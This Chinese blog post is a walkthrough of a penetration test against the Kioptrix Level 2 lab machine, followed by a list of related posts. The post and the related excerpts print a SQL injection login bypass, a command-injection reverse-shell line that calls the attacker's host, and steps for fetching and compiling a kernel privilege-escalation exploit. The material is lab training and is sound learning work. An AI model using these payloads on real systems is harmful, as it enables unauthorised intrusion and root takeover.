kioptrix-level2 渗透测试

最新推荐文章于 2025-05-08 20:25:06 发布
最新推荐文章于 2025-05-08 20:25:06 发布
阅读量575 收藏 5
点赞数 3
CC 4.0 BY-SA版权
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/viki101/article/details/133085177

一.信息收集

1.1查看本机ip

ifconfig

1.2nmap扫描c段

目标机ip为192.168.122.134

1.3nmap扫描端口及协议

nmap -sV -Pn -A 192.168.122.134

开启了80(80/tcp open  http   Apache httpd 2.0.52 ((CentOS))),

3306 (3306/tcp open  mysql      MySQL (unauthorized))端口,可以利用。

二.端口探测

2.1访问192.168.122.134

一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。

用户名admin' or 1=1# 密码为空

直接跳转,得来全不费功夫呀

首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。

2.2首先来ping一下正常地址。

接下来就拼接命令。

127.0.0.1&&whoami

其权限为apache,之后尝试反弹shell

2.3kali监听,反弹shell

root@kali:~# nc -lvvp 2333

提交页面使用命令

127.0.0.1&&bash -i >& /dev/tcp/192.168.122.128/2333 0>&1

回弹成功,但不是root权限。

三.内核提权

3.1考虑内核漏洞提权

Apache httpd 2.0.52 ((CentOS))

根据nmap扫描结果显示,可以发现CentOS,

3.2Linux查看系统版本和内核版本命令

uname -a

lsb_release -a

发现centos内核版本为4.5.

3.3接下来老规矩,利用漏洞。

kali@kali:~$ searchsploit CentOS 4.5

其第二个脚本可以利用

locate linux_x86/local/9542.c

将其复制到桌面上

cp  /usr/share/exploitdb/exploits/linux_x86/local/9542.c  /home/kali/Desktop

3.4接下来就是将脚本传入到目标机中

Kai本机开启http服务,

python -m SimpleHTTPServer 8000

然后目标机下载

先cd到tmp目录下,否则权限不够

cd /tmp

wget 192.168.122.128:8000/Desktop/9542.c

进行编译

gcc 9542.c 

ls命令发现编译后的文件

a.out

运行a.out

./a.out

提权成功。

Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 717
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
渗透测试靶机---Kioptrix_Level_1
久恙502的博客
07-19 762
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 553
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
OSCP备战-kioptrix level _2详细分析
最新发布
2301_81864699的博客
05-08 240
得出目标IP:也可以使用。
Vulnhub靶机 Kioptrix: Level 2
菜浪马废的博客
04-08 341
找靶机,扫端口 没有验证机制 看的我都想暴力破解了 万能密码试一下 可以绕过 admin‘ or ’1‘=’1 抓包,这个样子 命令执行 192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1& nmap -lnvp 4444 linux内核2.6.9 ...
Kioptrix Level2
底层社会中的弱智
04-16 967
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1334
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 324
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Kioptrix-Level4
12-29
### Kioptrix Level 4 渗透测试虚拟机挑战详情 Kioptrix系列是专门为渗透测试学习者设计的一组虚拟机,旨在提供实际操作环境来练习各种攻击技巧。对于Level 4版本而言,该机器引入了一些更复杂的防护机制以及漏洞...
渗透测试靶机---Kioptrix Level 3
久恙502的博客
07-19 431
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 1021
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Vulnhub系列:Kioptrix Level 2
Fuzz
07-31 337
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 运行环境 kali:192.168.44.128 Vulnhub靶机:192.168.44.133 相关知识点 0x00、信息收集 主机发现 :nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV -T5 -p- 192.168.44.133 0x01、Web 发现 ...
Kioptrix Level 2
2303_76157831的博客
03-31 179
admin后的 ' 使原来的代码中的单引号进行闭合,再拼接 or '1'='1 达到万能密码的作用,“or”代表只要有一个条件为真整个语句就为真 ,我们在“or”后面构造 '1'='1 ,这样即使我们并不知道账号密码,但是“or”后方的 '1'='1 等式恒成立,(因为我们输入的账号为 admin' 已经提前手动闭合 ,所以,在代码中显示的完整版为 'admin' or '1'='1' )
类OCSP靶场-Kioptrix系列-Kioptrix Level 2
星海幻影的博客
12-17 1501
本文主要介绍了在渗透测试网络安全攻防演练中,针对目标系统进行信息收集、漏洞挖掘以及提权过程的关键步骤。首先,文章概述了信息收集的几大重要环节,包括主机发现、端口扫描、目录爆破和敏感信息搜寻。通过这些手段,渗透测试者能够全面了解目标系统的网络拓扑、开放端口、目录结构以及潜在的安全隐患。 其次,文章深入讨论了根据服务版本信息搜索漏洞的过程。通过查找公开的漏洞利用代码(exp),并进行编译,渗透测试者能够测试并利用这些漏洞进行系统入侵。特别是如何查看并理解exp的使用方法,并加以利用,达到攻击目标系统的目的。
Kioptrix Level2靶机
wanjia01的博客
12-13 516
Kioptrix Level2靶机 WP
Vulnhub系列:Kioptix Level 2
2302_78903258的博客
07-26 981
利用arp-scan -l命令查询主机netdicover工具查询主机:netdiscover -i eth0nmap命令查询端口:nmap -nvv -Pn -sSV -p [port] --version-intensity 9 -A [ip]nikto工具扫描漏洞:nikto -h [ip] #-h:-host的简写dirbuster扫描目录弱口令破解sql注入漏洞:admin' OR 1=1/*利用nc反弹shell:nc lvp [ports];
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 965
Kioptrix Level 2靶机wp
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2645
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

viki101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值